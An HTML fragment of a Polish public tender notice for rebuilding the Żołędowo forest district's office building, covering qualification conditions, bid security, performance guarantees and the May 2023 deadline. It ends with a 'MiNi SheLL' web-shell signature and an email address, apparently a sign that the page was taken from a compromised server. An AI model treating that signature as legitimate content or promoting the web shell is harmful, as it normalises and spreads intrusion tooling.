class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1) sytuacji ekonomicznej lub finansowej.<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania warunku udziału w postępowaniu w<br/>odniesieniu do warunku dot. zdolności ekonomicznej. Warunek w odniesieniu do sytuacji finansowej, zostanie spełniony,<br/>jeśli Wykonawca wykaże, że:<br/>• posiada środki finansowe lub zdolność kredytową nie mniejszą niż:<br/>700 000,00 zł<br/>• jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 700<br/>000,00 zł<br/>2) zdolności technicznej lub zawodowej.<br/>a) Warunek ten, w zakresie doświadczenia, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich<br/>5 lat od dnia w którym upływa termin składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie)<br/>zrealizował lub realizuje (przy czym w tym przypadku będzie liczona wartość zrealizowanej części przedmiotu umowy) co<br/>najmniej 1 robotę budowlaną (przez robotę rozumie się wykonywanie prac na podstawie 1 umowy) polegającą na<br/>wykonywaniu remontu lub przebudowy obiektu budowlanego, na kwotę nie mniejszą niż<br/>700 000,00 zł.<br/>b) Warunek ten, w zakresie osób skierowanych przez wykonawcę do realizacji zamówienia, zostanie uznany za spełniony,<br/>jeśli Wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej jednym kierownikiem budowy posiadającym<br/>uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej, określone<br/>przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U. 2021 poz. 2351 z późn. zm.) lub odpowiadające im<br/>uprawnienia budowlane wydane w oparciu o wcześniej obowiązujące przepisy prawa, który pełnił funkcję kierownika<br/>budowy przy budowie, przebudowie lub remoncie co najmniej jednego obiektu. Dopuszcza się osoby posiadające<br/>uprawnienia wydane za granicą zgodnie z przepisami o uznawaniu kwalifikacji zawodowych.<br/>7.2. Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą „spełnia”/„nie spełnia”, w<br/>oparciu o informacje zawarte w dokumentach i oświadczeniach, o których mowa w rozdziale 9.<br/>7.3. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Żaden z Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia nie może podlegać wykluczeniu z postępowania. W przypadku Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia warunki udziału w postępowaniu określone w pkt 7.1. powinni spełniać łącznie wszyscy Wykonawcy, z zastrzeżeniem, iż warunek opisany w pkt 7.1. ppkt 2) lit. a) winien spełniać co najmniej jeden z tych<br/>Wykonawców.<br/>7.4. Wykonawca może w celu potwierdzenia spełnienia warunków udziału w postępowaniu polegać na zdolnościach<br/>technicznych lub zawodowych lub sytuacji ekonomicznej i finansowej innych podmiotów, niezależnie od charakteru<br/>prawnego łączących go z nimi stosunków. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykaz podmiotowych<br/>środków dowodowych według pkt 9 SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz podmiotowych<br/>środków dowodowych według pkt 9 SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> W terminie składania ofert określonym w pkt 14.1. SWZ wykonawca zobowiązany jest złożyć Zamawiającemu Ofertę<br/>zawierającą:<br/>a) formularz Oferty (sporządzony wg wzoru stanowiącego załącznik nr 1 do SWZ) wraz z Kosztorysem Ofertowym,<br/>sporządzone pod rygorem nieważności, w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym bądź podpisem osobistym.<br/>b) oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej grupy kapitałowej<br/>stanowiącej Załącznik nr 3 do SWZ<br/>c) aktualne na dzień składania ofert oświadczenie Wykonawcy stanowiące wstępne potwierdzenie spełniania warunków<br/>udziału w postępowaniu oraz brak podstaw wykluczenia wg. wzoru stanowiącego Załącznik nr 2 do SWZ.<br/>d) zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na<br/>potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów zgodnie z pkt 9.2. SWZ, jeżeli Wykonawca<br/>wykazując spełnienie warunków udziału w postępowaniu polega na zdolnościach lub sytuacji innych podmiotów;<br/>(Niewiążący wzór zobowiązania do oddania wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania<br/>zamówienia stanowi załącznik nr 4 do SWZ),<br/>e) odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub<br/>innego właściwego rejestru w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego<br/>reprezentowania. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w zdaniu poprzednim, jeżeli<br/>Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca dostarczy dane<br/>umożliwiające dostęp do tych dokumentów,<br/>f) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy, jeżeli w imieniu<br/>Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w pkt<br/>13.4. lit f) SWZ.<br/>g) pełnomocnictwo lub inny dokument potwierdzający umocowanie dla pełnomocnika ustanowionego przez Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia do reprezentowania ich w postępowaniu albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, jeżeli ofertę składają Wykonawcy wspólnie ubiegający<br/>się o udzielenie zamówienia, sporządzone pod rygorem nieważności, w formie elektronicznej lub postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub osobistym.<br/>h) dokumenty, o których mowa wyżej w pkt 13.4. lit f) i g) SWZ dla osoby działającej w imieniu podmiotu udostępniającego<br/>Wykonawcy zasoby na zasadach określonych w art. 118 PZP,<br/>i) wadium w oryginale w postaci elektronicznej, opatrzonej kwalifikowanym podpisem elektronicznym osób upoważnionych<br/>do jego wystawienia (tylko, gdy Wykonawca wnosi wadium w formie niepieniężnej). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium w wysokości 14 000,00 zł.<br/>Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwanie do dnia upływu terminu<br/>związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 PZP.<br/>11.2. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn.: Dz. U. z 2020 r. poz. 299).<br/>11.3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego w banku: BNP<br/>PARIBAS Bank Polski S.A. Oddz. Bydgoszcz 30 2030 0045 1110 0000 0047 6320 z dopiskiem: wadium na zabezpieczenie<br/>oferty w postępowaniu na ROZBUDOWA I PRZEBUDOWA BUDYNKU USŁUGOWEGO(ADMINISTRACYJNEGO) –<br/>SIEDZIBY NADLEŚNICTWA ŻOŁĘDOWO. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie<br/>zostanie zaliczone na rachunku bankowym Zamawiającego. Wadium wniesione w pieniądzu Zamawiający przechowuje na<br/>rachunku bankowym.<br/>11.4. Z treści wadium wnoszonego w formie: gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach<br/>udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej<br/>Agencji Rozwoju Przedsiębiorczości powinno wynikać bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez<br/>Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w<br/>okolicznościach określonych w art. 98 ust. 6 PZP.<br/>11.5. Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 11.2. ppkt 2)-4) należy przekazać<br/>Zamawiającemu wraz z Ofertą w oryginale w postaci elektronicznej tj. opatrzonej kwalifikowanym podpisem elektronicznymi<br/>osób upoważnionych do jego wystawienia. Wadium musi zabezpieczać ofertę na daną część zamówienia przez cały okres<br/>związania ofertą. Oferta Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy, lub nie będzie<br/>utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o<br/>którym mowa w art. 98 ust. 2 pkt 3 PZP zostanie odrzucona z postępowania na podstawie art. 226 ust. 1 pkt 14 PZP.<br/>11.6. Treść gwarancji wadialnej musi zawierać następujące elementy:<br/>1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta (banku lub<br/>instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) oraz wskazanie ich siedzib,<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem – określenie przedmiotu zamówienia<br/>3) kwotę gwarancji/poręczenia,<br/>4) zobowiązanie gwaranta/poręczyciela do zapłacenia bezwarunkowo i nieodwołalnie kwoty gwarancji/poręczenia na<br/>pierwsze pisemne żądanie Zamawiającego w okolicznościach określonych w art. 98 ust. 6 PZP.<br/>11.7. Zamawiający zwraca wadium na zasadach uregulowanych w art. 98 ust. 1 - 5 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zamawiający wymaga wniesienia zabezpieczenia należytego wykonania umowy przez wykonawcę, którego oferta została<br/>uznana za najkorzystniejszą.<br/>20.2. Zabezpieczenie należytego wykonania umowy wynosić będzie 5% ceny łącznej wynikającej z Oferty Wykonawcy.<br/>20.3. Zabezpieczenie może być wnoszone według wyboru Wykonawcy w jednej lub w kilku następujących formach:<br/>1) pieniądzu;<br/>2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy<br/>jest zawsze zobowiązaniem pieniężnym;<br/>3) gwarancjach bankowych;<br/>4) gwarancjach ubezpieczeniowych;<br/>5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>20.4. W przypadku wniesienia wadium w pieniądzu Wykonawca może wyrazić zgodę na zaliczenie kwoty wadium na poczet<br/>zabezpieczenia.<br/>20.5. Zabezpieczenie wnoszone w pieniądzu wykonawca wpłaca przelewem na rachunek bankowy wskazany przez<br/>Zamawiającego. Jeżeli zabezpieczenie wniesiono w pieniądzu, Zamawiający przechowuje je na oprocentowanym rachunku<br/>bankowym. Zamawiający zwraca zabezpieczenie wniesione w pieniądzu z odsetkami wynikającymi z umowy rachunku<br/>bankowego, na którym było ono przechowywane, pomniejszone o koszt prowadzenia tego rachunku oraz prowizji bankowej<br/>za przelew pieniędzy na rachunek bankowy Wykonawcy.<br/>20.4. Zabezpieczenie należytego wykonania umowy, we wszystkich formach przewidzianych w pkt 20.3., powinno<br/>zabezpieczać roszczenia wynikające z niewykonania bądź nienależytego wykonania umowy w taki sam sposób, co oznacza,<br/>iż zabezpieczenie wniesione w formie innej niż pieniądz nie może zabezpieczać roszczeń Zamawiającego w sposób mniej<br/>korzystny, niż jakby miało to miejsce w przypadku wniesienia zabezpieczenia w pieniądzu. Zabezpieczenie należytego<br/>wykonania umowy w formie gwarancji/poręczenia powinno być nieodwołalne, bezwarunkowe i płatne na pierwsze pisemne<br/>żądanie Zamawiającego. Zamawiający nie dopuszcza możliwości uzależnienia wypłaty kwot z gwarancji/poręczenia od<br/>przedłożenia jakichkolwiek dodatkowych dokumentów, bądź spełnienia jakichkolwiek warunków, poza oświadczeniem<br/>Zamawiającego, iż żądana kwota jest należna z tytułu niewykonania bądź nienależytego wykonania umowy.<br/>20.5. Zamawiający zwróci zabezpieczenie w terminie 15 dni od dnia po upływie terminu gwarancji. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany Umowy muszą być dokonywane z zachowaniem wymogów wynikających z przepisów Prawa zamówień<br/>publicznych.<br/>2. Wszelkie zmiany Umowy wymagają zachowania formy pisemnej pod rygorem nieważności.<br/>3. Określając warunki dokonania zmiany Umowy, sporządza się Protokół konieczności, biorąc pod uwagę w szczególności:<br/>1) opis zmiany;<br/>2) uzasadnienie zmiany;<br/>3) koszt zmiany i sposób jego wyliczenia;<br/>4) wpływ zmiany na wysokość wynagrodzenia;<br/>5) czas wykonania zmiany;<br/>6) wpływ zmiany na termin zakończenia Umowy.<br/>Szczegółowe warunki zmiany umowy zawiera § 22 załącznika nr 7 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-15 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem platformy JOSEPHINE do dnia 15.05.2023 r., godz.9:00</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-15 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający nie zastrzega obowiązku odbycia wizji lokalnej przez wykonawców.

Creat By MiNi SheLL
Email: jattceo@gmail.com